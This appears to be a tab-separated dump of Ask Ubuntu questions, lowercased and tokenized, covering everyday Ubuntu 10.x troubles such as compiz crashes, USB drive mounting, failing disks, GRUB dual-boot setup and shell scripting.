/home/tvera/downloads/cr_install/tifm_core.c:190 : error : implicit declaration of function ‘class_device_initialize’ /home/tvera/downloads/cr_install/tifm_core.c : in function ‘tifm_add_adapter’ : /home/tvera/downloads/cr_install/tifm_core.c:211 : error : ‘bus_id_size’ undeclared ( first use in this function ) /home/tvera/downloads/cr_install/tifm_core.c:211 : error : ( each undeclared identifier is reported only once /home/tvera/downloads/cr_install/tifm_core.c:211 : error : for each function it appears in . ) /home/tvera/downloads/cr_install/tifm_core.c:212 : error : implicit declaration of function ‘class_device_add’ /home/tvera/downloads/cr_install/tifm_core.c : in function ‘tifm_remove_adapter’ : /home/tvera/downloads/cr_install/tifm_core.c:237 : error : implicit declaration of function ‘class_device_del’ /home/tvera/downloads/cr_install/tifm_core.c : in function ‘tifm_free_adapter’ : /home/tvera/downloads/cr_install/tifm_core.c:243 : error : implicit declaration of function ‘class_device_put’ /home/tvera/downloads/cr_install/tifm_core.c : in function ‘tifm_alloc_device’ : /home/tvera/downloads/cr_install/tifm_core.c:275 : error : ‘struct device’ has no member named ‘bus_id’ /home/tvera/downloads/cr_install/tifm_core.c:275 : error : ‘bus_id_size’ undeclared ( first use in this function ) make [ 2 ] : *** [ /home/tvera/downloads/cr_install/tifm_core.o ] error 1 make [ 1 ] : *** [ _module_/home/tvera/downloads/cr_install ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-2.6.35-25-generic' make : *** [ all ] error 2 the output of lsusb : bus 001 device 005 : id 05e3:0702 genesys logic , inc. usb 2.0 ide adapter bus 003 device 003 : id 0458:003a kye systems corp. ( mouse systems ) netscroll+ mini traveler bus 003 device 002 : id 08ff:2580 authentec , inc. aes2501 fingerprint sensor bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
31167	how can i restart compiz from tty ? ( & related , how can i set up a fallback wm ? )	so i 'm testing natty , and compiz keeps crashing on me . i expect this sort of thing from alpha software , of course , but it does n't always give me the option to restart compiz , and for some reason does n't have a fallback wm configured . without a window manager , all my programs are still running , but they 're not accepting input from the keyboard , and i ca n't switch between them . i can , however , press ctrl+alt+f1 and get a terminal , and i can killall xorg to reset everything , but i 'd rather just reset compiz if possible . if i try typing compiz -- replace there in the tty , it complains `` fatal -- could n't open display . '' is there a way to have tty1 restart compiz ? like compiz -- replace -- display=something ? additionally , is there a way to configure a fallback window manager so that there 's an easier way to recover from compiz crashing ?
31168	can not mount external usb 3.0 hard disk	i have a usb 3.0 external hard disk which i am unable to mount . the entry appears in the `` lsusb '' command , but i do not exactly understand how to mount it . this is the output for my lsusb command . `` asmedia technology inc. '' is the usb 3.0 device . i would appreciate some help in mounting and accessing the hard disk . this the relevant output of my `` sudo fdisk -l '' when i connect the usb 3.0 hdd to a normal usb 2.0 port : disk /dev/sdb : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x8e0eee9e device boot start end blocks id system /dev/sdb1 * 1 13 102400 7 hpfs/ntfs partition 1 does not end on cylinder boundary . /dev/sdb2 13 38914 312466432 7 hpfs/ntfs as you can see the sdb drive and paritions are listed accurately . however when i connect the usb 3.0 hdd to the ( expresscard34 ) usb 3.0 port and run the same `` sudo fdisk -l '' command , the sdb drives are not detected . they only seem to appear in the `` lsusb '' output . i have given the `` sudo fdisk -l '' output below : disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000b441f device boot start end blocks id system /dev/sda1 * 1 37434 300686336 83 linux /dev/sda2 37434 38914 11882497 5 extended /dev/sda5 37434 38914 11882496 82 linux swap / solaris this the relevant output of my `` lsusb '' : lsusb bus 009 device 002 : id 174c:5106 asmedia technology inc . bus 008 device 002 : id 0a5c:2150 broadcom corp. bcm2046 bluetooth device bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 5986:0205 acer , inc bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub this the relevant output of my `` lsusb -v '' : bus 009 device 002 : id 174c:5106 asmedia technology inc. device descriptor : blength 18 bdescriptortype 1 bcdusb 2.10 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 idvendor 0x174c asmedia technology inc. idproduct 0x5106 bcddevice 0.01 imanufacturer 2 asmedia iproduct 3 as2105 iserial 1 00000000000000000000 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 32 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xc0 self powered maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 2 binterfaceclass 8 mass storage binterfacesubclass 6 scsi binterfaceprotocol 80 bulk ( zip ) iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x02 ep 2 out bmattributes 2 transfer type bulk synch type none usage type data wmaxpacketsize 0x0200 1x 512 bytes binterval 0 device qualifier ( for other device speed ) : blength 10 bdescriptortype 6 bcdusb 2.10 bdeviceclass 0 ( defined at interface level ) bdevicesubclass 0 bdeviceprotocol 0 bmaxpacketsize0 64 bnumconfigurations 1 device status : 0x0001 self powered bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub device descriptor : blength 18 bdescriptortype 1 bcdusb 3.00 bdeviceclass 9 hub bdevicesubclass 0 unused bdeviceprotocol 3 bmaxpacketsize0 9 idvendor 0x1d6b linux foundation idproduct 0x0003 3.0 root hub bcddevice 2.06 imanufacturer 3 linux 2.6.35-28-generic xhci_hcd iproduct 2 xhci host controller iserial 1 0000:04:00.0 bnumconfigurations 1 configuration descriptor : blength 9 bdescriptortype 2 wtotallength 25 bnuminterfaces 1 bconfigurationvalue 1 iconfiguration 0 bmattributes 0xe0 self powered remote wakeup maxpower 0ma interface descriptor : blength 9 bdescriptortype 4 binterfacenumber 0 balternatesetting 0 bnumendpoints 1 binterfaceclass 9 hub binterfacesubclass 0 unused binterfaceprotocol 0 full speed ( or root ) hub iinterface 0 endpoint descriptor : blength 7 bdescriptortype 5 bendpointaddress 0x81 ep 1 in bmattributes 3 transfer type interrupt synch type none usage type data wmaxpacketsize 0x0004 1x 4 bytes binterval 12 hub descriptor : blength 9 bdescriptortype 41 nnbrports 4 whubcharacteristic 0x0009 per-port power switching per-port overcurrent protection tt think time 8 fs bits bpwron2pwrgood 10 * 2 milli seconds bhubcontrcurrent 0 milli ampere deviceremovable 0x00 portpwrctrlmask 0xff hub port status : port 1 : 0000.0100 power port 2 : 0000.0100 power port 3 : 0000.0503 highspeed power enable connect port 4 : 0000.0503 highspeed power enable connect device status : 0x0003 self powered remote wakeup enabled this is the error given when i try to mount the hard drive : shinso @ shinso-ideapad : ~ $ sudo mount /dev/sdb /mnt [ sudo ] password for shinso : mount : /dev/sdb : unknown device this the output of `` dmesg|tail '' : [ 30062.774178 ] either the lower file is not in a valid ecryptfs format , or the key could not be retrieved . plaintext passthrough mode is not enabled ; returning -eio [ 30535.800977 ] usb 9-4 : usb disconnect , address 3 [ 30659.237342 ] valid ecryptfs headers not found in file header region or xattr region [ 30659.237351 ] either the lower file is not in a valid ecryptfs format , or the key could not be retrieved . plaintext passthrough mode is not enabled ; returning -eio [ 31259.268310 ] valid ecryptfs headers not found in file header region or xattr region [ 31259.268313 ] either the lower file is not in a valid ecryptfs format , or the key could not be retrieved . plaintext passthrough mode is not enabled ; returning -eio [ 31860.059058 ] valid ecryptfs headers not found in file header region or xattr region [ 31860.059062 ] either the lower file is not in a valid ecryptfs format , or the key could not be retrieved . plaintext passthrough mode is not enabled ; returning -eio [ 32465.220590 ] valid ecryptfs headers not found in file header region or xattr region [ 32465.220593 ] either the lower file is not in a valid ecryptfs format , or the key could not be retrieved . plaintext passthrough mode is not enabled ; returning -eio i am using ubuntu 10.10 ( 64 bit ) . i have included a screengrab from disk utility for people who want extra info . http : //i.stack.imgur.com/mcfrh.png any help is appreciated .
31170	disk failing on dell mini , are there diagnostic tools ?	my dell mini 10v running ubuntu 10.10 runs ok for hours , but then will suddenly slow down drastically . switching to a console shows lots of error messages , which also get into /var/log/syslog . these errors happen every couple of seconds . i 'm figuring that the disk is failing , but is there anyway to be sure , and can laptop disks be replaced easily ? mar 20 11:08:12 dell-mini kernel : [ 2476.378774 ] ata1.00 : status : { drdy err } mar 20 11:08:12 dell-mini kernel : [ 2476.378785 ] ata1.00 : error : { unc } mar 20 11:08:12 dell-mini kernel : [ 2476.449841 ] ata1.00 : configured for udma/133 mar 20 11:08:12 dell-mini kernel : [ 2476.449887 ] ata1 : eh complete mar 20 11:08:14 dell-mini kernel : [ 2478.777754 ] ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 mar 20 11:08:14 dell-mini kernel : [ 2478.777976 ] ata1.00 : bmdma stat 0x24 mar 20 11:08:14 dell-mini kernel : [ 2478.778059 ] ata1.00 : failed command : read dma mar 20 11:08:14 dell-mini kernel : [ 2478.778162 ] ata1.00 : cmd c8/00:08:43:3b:97/00:00:00:00:00/e0 tag 0 dma 4096 in mar 20 11:08:14 dell-mini kernel : [ 2478.778166 ] res 51/40:00:47:3b:97/00:00:00:00:00/00 emask 0x9 ( media error )
31172	need an interface for a gui shell script more powerful than zenity	i want to write shell script file that has a gui with multiple input boxes for user entry . i already tried zenity . any ideas or advice would be appreciated .
31174	graphics performance of 945gme	edit : since setting appearance - > visual effects up to a stunning `` normal '' , i now get ~35 fps in glxgears right after login , with nothing else running : ( i 'm getting terrible graphics performance in neverwinter nights ( native with sou+hotu+cep2 ) on my eee pc 1005hab . even with all graphics settings ( including the `` advanced '' ones ) at minimum i get about 2-10 fps , depending on the scene . firefox is really sluggish as well - changing tabs often takes a second , scrolling is laggy , and typing this i notice the delay between pressing keys and seeing the text on screen . the rest of the os is running ok , although general performance seems to be even worse than my old eee pc 900. glxgears gives about 60 fps , which is apparently as it should be ( synchronized with the monitor refresh rate ) . bugs like launchpad # 252094 and the instructions for reverting the jaunty xorg intel driver to 2.4 are old enough that i 'm afraid following the instructions would render the system unusable . are there any tips for improving graphics performance on this system that are still relevant for 10.10 ? $ uname -a linux l0b0eee 2.6.35-28-generic # 49-ubuntu smp tue mar 1 14:40:58 utc 2011 i686 gnu/linux $ lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 945gme express integrated graphics controller [ 8086:27ae ] ( rev 03 ) $ glxinfo name of display : :0.0 display : :0 screen : 0 direct rendering : yes server glx vendor string : sgi server glx version string : 1.4 ...
31175	apt-get install problem : errors were encountered while processing : sun-j2sdk1.6	i have the following problem every time i run apt-get install : for example : installing python-django-south ... unpacking python-django-south ( from ... /python-django-south_0.5-2_all.deb ) ... setting up sun-j2sdk1.6 ( 1.6.0+update22-linux-i586 . ) ... update-alternatives : error : alternative path /usr/lib/j2sdk1.6-sun/jre/plugin/amd64/ns7/libjavaplugin_oji.so does n't exist . dpkg : error processing sun-j2sdk1.6 ( -- configure ) : subprocess installed post-installation script returned error exit status 2 setting up python-django-south ( 0.5-2 ) ... processing triggers for python-support ... errors were encountered while processing : sun-j2sdk1.6 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what could be the problem ? i have 9.10 ubuntu
31177	list top/bottom ten lines of a word matching in a file	how do i list top or bottom 10 lines from the line that matched the word 'error ' in a file . i 'm using grep 'error ' /var/log/logfile.log > errors to print and save the lines that matched the word 'error ' in to the file called 'errors ' . how could i change this to suite my requirement ? . anybody has any idea ?
31179	msn account not connecting on empathy	msn keeps `` connecting '' without actually doing so eventually . is n't the : server : messenger.hotmail.com port : 1863 ?
31180	how to get disable nvidia graphics card ( which has recently expired ) so that i can boot desktop ?	i have a 3-4 years old laptop ( compaq v3000 ) , which had win vista with ubuntu 10.10 in dual boot configuration . the graphics card inside is an old nvidia geforce go 7200 . one fine day , my graphics card died ( of old age , presumably ) - resulting in myself being initially unable to boot to winvista and ubuntu 10.10 . i solved the problem with winvista ( disabled nvidia card after booting to safe mode ) , but i do n't know how to do the same with ubuntu . i can only disable the 3rd-party driver after i boot to desktop , but since its crashing before that , i 'm unable to do so . can anyone help me disable the graphics card in ubuntu ?
31183	what wireless mice work well with ubuntu ?	i 'm in desperate need of a decent comfortable mouse that will give me maximum performance on ubuntu . i 'm looking at a wireless microsoft mouse , but i am concerned it will not work effectively with ubuntu . is there a list of wireless mice that are confirmed to work well with ubuntu ? is there a place where i can get opinions from ubuntu users about mice ?
31197	ubuntu one says that my account is full , but it 's not	my ubuntu one is saying that my account is full . it has done that for over a week now , but its the account is not full at all . i have tried this guide : quit the ubuntu one preferences , if open open ( lucid ) : applications- > accessories- > passwords and encryption keys ( maverick ) : system - > preferences - > password and encryption keys click on the arrow next to `` passwords '' right-click on the ubuntu one token and select `` delete '' go to https : //one.ubuntu.com/account/machines/ click on the checkbox next to your computer click the `` remove selected computers '' button ( maverick ) : killall ubuntu-sso-login ; u1sdtool -q ; u1sdtool -c ( lucid ) : u1sdtool -q ; killall ubuntuone-login ; u1sdtool -c a web page , if in lucid , or a window , in maverick , should open , prompting you to add your computer to your ubuntu one account add your computer this guide did not change any thing and i still get the message that my account is full every time something is syncing . i 've also tried to create and connect to a new account , but the new account was doing the same . so i am now really confused . please help !
31201	where does the video we play on youtube go ?	usually , the video i played on youtube completed i can find it on temp folder , but now nothing inside there after being played completely .
31206	how can my audio input always be the webcam microphone ?	each time i want to use skype , i have to go in the sound preferences . and there , turn the audio-in to `` webcam '' and uncheck the `` mute '' button . it 's quite annoying . is there a way to always keep the same configuration ?
31212	intermittent access to win7 share	i ave a share on a windows 7 machine that is sometimes accessible from ubuntu and sometimes is n't . when i try to access it currently , i get the message : '' failed to mount windows share '' , and nothing more . gnome does n't appear to want to provide me with any more detailed information . i 've verified that the workgroup is set correctly and as noted in the title , sometimes the share does work . it seems like i can only access it once and then subsequent mounts are blocked . what is going on ? ! thanks !
31216	setting up aliases in zsh	i know that in bash you can set up aliases in a .bash_aliases file so that the command you type doesnt need to be a command stored in the binaries in the system . is there any way i can get aliases into zsh ?
31219	how to limit number of kernels shown in boot menu ?	i want to limit the number of kernels shown in my boot screen to say only the two latest ones . how can i do this with the new grub ? ( any method that does not require manually uninstalling all extraneous kernels is also welcome . )
31222	software to monitor all ubuntu systems	i have more than 150 ubuntu systems connected in a network . can someone suggest me a good monitoring software to monitor all these systems ? ? like i wan na check what are all the ips are up and what are all the ips are down etc etc..
31225	path command not found	i 'm not experienced with path ( any good reference would be appreciated ) , but i made a mistake and did path=/google_appengine , which i 'm assuming completely overrid path . still , i restarted bash and echo 'd path and found that the folders were back . mark @ mark-laptop : ~ $ echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games however , when i then tried to append to it , i got an error that path was n't found . i 've looked around google and could n't find a good answer . any help would be appreciated mark @ mark-laptop : ~ $ path = $ path : /google_appengine path : command not found
31232	ubuntu on amd based sony vaio vpcy b15ag	last week i bought a amd e350 ( amd fusion platform ) based sony vaio ( vpcyb15ag ) having amd radeon hd 6310 graphics , i removed windows that came along with and installed ubuntu 10.10 ( amd64 ) using usb drive . during installation my touchpad was not working , i managed through keyboard , but after completing installation & restarting the machine still there was no touchpad support . also there 's no proper graphic card drivers . even i tried connecting the usb mouse to it but the left key is not working and had to configure the mouse as left-hand to get the left click enabled . i tried searching for any possible solutions for these but found nothing helpful , is there any hope ? what should i do to enable i ) enable touch pad support ii ) get higher resolution 1366x768 , etc ?
31233	combine two commands in a script	i want to put two commands together i need the script to login : ssh root @ 192.168.0.188 then i need to the script to run ( while logged in to root @ 192.168.0.188 via ssh ) : find /var/mobile/media/music/ -name `` *.mp3 '' -exec ln -s { } /var/mobile/media/music/ '' all songs '' \ ;
31240	how to shift applications from workspace 1 to 2 using command	is there any way i can switch the application running in one workspace to another on command line ? i use ubuntu 10.04 update1 as per suggestions below wmctrl -l 0x02200003 -1 bond bottom expanded edge panel 0x02200049 -1 bond top expanded edge panel 0x02000020 0 bond x-nautilus-desktop 0x04e00004 0 bond bond @ bond : ~ 0x0482a380 0 bond omg ! ubuntu ! | wmctrl - chromium 0x05000072 0 bond how to shift applications from workspace 1 to 2 using command - ask ubuntu - stack exchange - google chrome now when i type wmctrl -r : omg ! ubuntu ! | wmctrl - chromium : -t 2 no window was specified . so how to use it properly what is the mistake in above ? update2 i tried wmctrl -r 0x05000072 -t 2 but the windows had no effect and they remained in same work space .
31244	how to install python 2.7 ?	i have some troubles installing python2.7 on ubuntu 10.10 i ran sudo apt-get install python2.7 ( * ) but when i try to run an example program i get the ~/downloads % python2.7 clockwindow.py traceback ( most recent call last ) : file `` clockwindow.py '' , line 1 , in < module > import pygtk importerror : no module named pygtk error messages , so what 's the best way to install python and its modules ?
31250	fast image cropping	i have scanned some family albums on my flatbed scanner . the scanner glass has room for three photos , so i ended up with nearly 500 jpegs that needs to be cropped to three images each . gimp seems to be a little slow for this kind of job . is there any other photo editing tool that would easily let me draw three rectangles , and crop them , and save each selection in a different file ?
31252	how to enable nvidia-settings and nvclock to set clock frequencies	i am trying to modify the clock frequencies in nvidia-settings . i have added the option coolbits 1 in my /etc/x11/xorg.conf file and restarted gdm , and even my computer . the options are now available in nvidia-settings , and i can slide the slider up and down , but when i choose `` apply '' it simply reverts them back to default . i even tried to run nvidia-settings by way of sudo , and i got the same result . i also installed nvclock and i am trying to modify clock and fan settings through that command-line utility , but with no avail there either . the fan speed says it is increased to 100 % for example , but the fan does not change and nvidia-settings stays stable at 35 % fan speed . i am running 10.10 x86 and nvidia driver 260.19.06 with a 9600 gt .
31253	grub : fixing partitions so ubuntu is bootable	i have messed up my partitions so now grub does n't work correctly , and i end up with a grub > prompt . i used the livecd to open up gparted , and found the following : can someone help me with fixing up the partitions or let me know how to fix them up so that i can boot my netbook with ubuntu 10.04 ? thanks .
31255	is it possible to view netflix instant movies on ubuntu ?	i 've tried boxxe and moonlight but nothing works .
31257	unable to mount iphone	i get the following error each time i plug in my iphone 3gs to usb . unable to mount ( name ) iphone : dbus error org.freedesktop.dbus.error.noreply : message did not receive a reply ( timeout by message bus ) anyone else have this error and know of a fix ? i 'm using ubuntu 10.10 .
31258	how can i type an em-dash ( — ) ?	the title pretty much says it all : how can i type an em-dash ( — ) ?
31259	has this windows application been successfully installed via wine ?	i just installed expresso via wine windows program loader . the installation seemed to be fine . but when i click the program item from applications - > wine - > programs - > expresso - > expresso , the cursor rotated a few seconds and then nothing happened . later i checked back on the expresso website , where there is a paragraph describing the installation process : you may be prompted to install the .net framework . if you are not taken there automatically , download and install the 2.0 or later version of the framework from the microsoft web site . restart the expresso install file after installing the framework . i was wondering if i have installed expresso successfully ? if not , how shall i do ? do i have to install .net framework , and how to ? i also would like to know if it worth to install .net framework ? my intention to install expresso is just to have a nice editor for using regex . thanks and regardsďź ps : my wine version is 1.2.2-0ubuntu2~maverick2 , and my os is ubuntu 10.10 .
31260	recommendation for regex editor ?	i asked for recommendations for regex editors on stackoverflow a while ago . following is one of the replies : what is `` good '' depends on what is most useful to you . for me , though , these are the key features for a good regex editor ( besides the ability to test and create regular expressions , of course , which is a prerequisite to be called a `` regex editor '' : - ) : displays matches hierarchically with captured groups . explains/analyzes an entered regex in plain english , showing a hierarchical tree . translates your regex into code for a language of your choice . regexbuddy , as @ max mentioned , does all these but there is also a free alternative , expresso that also does them very well . these two utilities are the only ones i have found with the crucial ability to explain a regex . the features sound very attractive to me . but later i found the two are for windows . i tried to install expresso , the free one , via wine , but met some trouble , about which i asked in another post . so i was wondering if in ubuntu there are some applications comparable to regexbuddy and expresso ? if it is required to install .net framework in order to install expresso , is it still worth to install expresso on ubuntu ? thanks and regards !
31268	how to migrate installed system to raid1 ?	i have home server ( ubuntu server 10.04 ) which boots from single 80gb hdd drive , now i want to make it boot from 2x500gb raid-1 . i 've already successfully created it through mdadm . but how can i move system to this array so that it can boot ? i 've seen some guides in the internet about adding second hdd and making raid1 , but this is not my case ...
31271	how can i reinstall the codecs so i can play my videos back	i used to play videos from mp4 , wma files , as well as form dvds , but for some reason , i can no more . the file gets loaded and the player starts , but it is always a black screen . no display at all . what could go wrong ?
31272	add progress bar	i would like to include a zenity progress bar for this part of my script : zenity -- question -- title `` gui '' -- text `` sync music to ipad ? '' if [ [ $ ? == 0 ] ] ; then scp -r `` $ folder '' root @ 192.168.0.188 : /var/mobile/media/music ssh root @ 192.168.0.188 'rm /var/mobile/media/music/ '' all songs '' /*' ssh root @ 192.168.0.188 'find /var/mobile/media/music/ -name `` *.mp3 '' -exec ln -s { } /var/mobile/media/music/ '' all
31273	difference between wine and mono	as far as i know , both wine and mono are used to run windows applications under ubuntu . so i was wondering what their differences are ? are they both virtual machines ? or does each belong to some other category ? it is better when to use which for what kinds of windows applications ? for example , those applications that may or may not require .net framework . do they depend on each other ? are they required to install together ? or does each work independently without existence of the other ? thanks and regards !
31286	additional keyrings for apt in trusted.gpg.d	i 'm creating a package that will automatically install some repositories to all hosts in the lan . the package will be accessible from the central repository . i 've discovered that repo lists can be dropped in '/etc/apt/sources.list.d/*.list ' . now i need to import their keys , for instance , this one . however , when i drop it into '/etc/apt/trusted.gpg.d/opera.gpg ' , apt-get update gives me a plenty of no_pubkey errors for all repos i have , including opera ! what 's wrong ? : )
31289	dual booting on separate hard drives	i have windows xp professional installed on 1 hard drive and ubuntu 10.10 on my second hard drive . on start up the computer completely skips the grub menu and boots straight into 10.10 . i have tried running os-prober with the windows hard drive mounted and then updating grub but it didnt work . any ideas ? i have changed the boot order so that the hdd with xp on it is first however the computer still booted into linux . i tried running grub-install /dev/sda and got this /usr/sbin/grub-setup : warn : sector 32 is already in use by flexnet ; avoiding it . this software may cause boot or other problems in future . please ask its authors not to store data in the boot track.. /usr/sbin/grub-setup : warn : sector 33 is already in use by flexnet ; avoiding it . this software may cause boot or other problems in future . please ask its authors not to store data in the boot track.. installation finished . no error reported i checked using disk utility and the code for my xp hard drive is sdb so i ran the camand grub-install /dev/sdb shich gave me this installation finished . no error reported . so i rebooted but it still didnt work . any other ideas ? additional info gedit /boot/grub/grub.cfg : # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=640x480 load_video insmod gfxterm fi terminal_output gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c set locale_dir= ( $ root ) /boot/grub/locale set lang=en insmod gettext if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # menuentry 'ubuntu , with linux 2.6.35-28-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c linux /boot/vmlinuz-2.6.35-28-generic root=uuid=d682c9bd-dd89-4827-9802-a1f921ebe21c ro quiet splash initrd /boot/initrd.img-2.6.35-28-generic } menuentry 'ubuntu , with linux 2.6.35-28-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c echo 'loading linux 2.6.35-28-generic ... ' linux /boot/vmlinuz-2.6.35-28-generic root=uuid=d682c9bd-dd89-4827-9802-a1f921ebe21c ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.35-28-generic } menuentry 'ubuntu , with linux 2.6.35-22-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c linux /boot/vmlinuz-2.6.35-22-generic root=uuid=d682c9bd-dd89-4827-9802-a1f921ebe21c ro quiet splash initrd /boot/initrd.img-2.6.35-22-generic } menuentry 'ubuntu , with linux 2.6.35-22-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c echo 'loading linux 2.6.35-22-generic ... ' linux /boot/vmlinuz-2.6.35-22-generic root=uuid=d682c9bd-dd89-4827-9802-a1f921ebe21c ro single echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-2.6.35-22-generic } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set d682c9bd-dd89-4827-9802-a1f921ebe21c linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # if [ `` x $ { timeout } '' ! = `` x-1 '' ] ; then if keystatus ; then if keystatus -- shift ; then set timeout=-1 else set timeout=0 fi else if sleep -- interruptible 3 ; then set timeout=0 fi fi fi # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # sudo fdisk -l : disk /dev/sda : 80.1 gb , 80060424192 bytes 255 heads , 63 sectors/track , 9733 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0008a483 device boot start end blocks id system /dev/sda1 * 1 9352 75112448 83 linux /dev/sda2 9352 9734 3068929 5 extended /dev/sda5 9352 9734 3068928 82 linux swap / solaris disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc5d6c5d6 device boot start end blocks id system /dev/sdb1 1 60800 488375968+ 7 hpfs/ntfs sudo blkid /dev/sda1 : uuid= '' d682c9bd-dd89-4827-9802-a1f921ebe21c '' type= '' ext4 '' /dev/sda5 : uuid= '' 09e9c2cb-d903-4f0b-a181-536951845231 '' type= '' swap '' /dev/sdb1 : uuid= '' b21844eb1844afe1 '' type= '' ntfs '' sudo os-prober ( nothing ) boot info script 0.55 dated february 15th , 2010 ============================= boot info summary : ============================== = > grub 2 is installed in the mbr of /dev/sda and looks on the same drive in partition # 1 for ( , msdos1 ) /boot/grub . = > grub 2 is installed in the mbr of /dev/sdb and looks on the same drive in partition # 1 for ( , msdos1 ) /boot/grub . sda1 : _________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 10.10 boot files/dirs : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img sda2 : _________________________________________________________________________ file system : extended partition boot sector type : unknown boot sector info : sda5 : _________________________________________________________________________ file system : swap boot sector type : - boot sector info : sdb1 : 